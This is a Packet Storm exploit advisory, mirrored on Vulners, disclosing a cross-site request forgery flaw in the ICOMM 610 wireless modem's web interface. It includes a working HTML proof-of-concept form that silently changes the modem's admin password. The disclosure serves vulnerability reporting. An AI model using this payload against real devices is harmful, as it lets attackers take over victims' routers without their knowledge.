Lucene search
K

ICOMM 610 Wireless Modem Cross Site Request Forgery

🗓️ 02 Apr 2014 00:00:00Reported by Blessen ThomasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

ICOMM 610 Wireless Modem CSRF Vulnerabilit

Code
`Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability  
  
Google dork : N/A  
  
Date : 02/04/2014  
  
Exploit Author : Blessen Thomas  
  
Vendor Homepage : http://www.icommtele.com/  
  
Software Link : N/A  
  
Version : ICOMM 610  
  
Tested on : Device software version 01.01.08.991 (10/01/2010)  
  
Type of Application : Modem Web Application  
  
CVE : N/A  
  
Cross Site Request Forgery  
  
It was observed that this modem's Web Application , suffers from Cross-site  
  
request forgery through which attacker can manipulate user data via sending  
him malicious craft url.  
  
  
At attacker could change the password of the victim's account without the  
victim's knowledge as the  
  
application is not having a security token implemented.  
  
  
The Modem's application is not using any security token to prevent it  
against CSRF. You can manipulate any userdata. PoC and Exploit to change  
user password: In the POC the IP address in the POST is the modems IP  
address.  
  
  
  
<html>  
<!-- CSRF PoC --->  
<body>  
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">  
<input type="hidden" name="PasswdEnable" value="on" />  
<input type="hidden" name="New_Passwd" value="test" />  
<input type="hidden" name="Confirm_New_Passwd" value="test" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation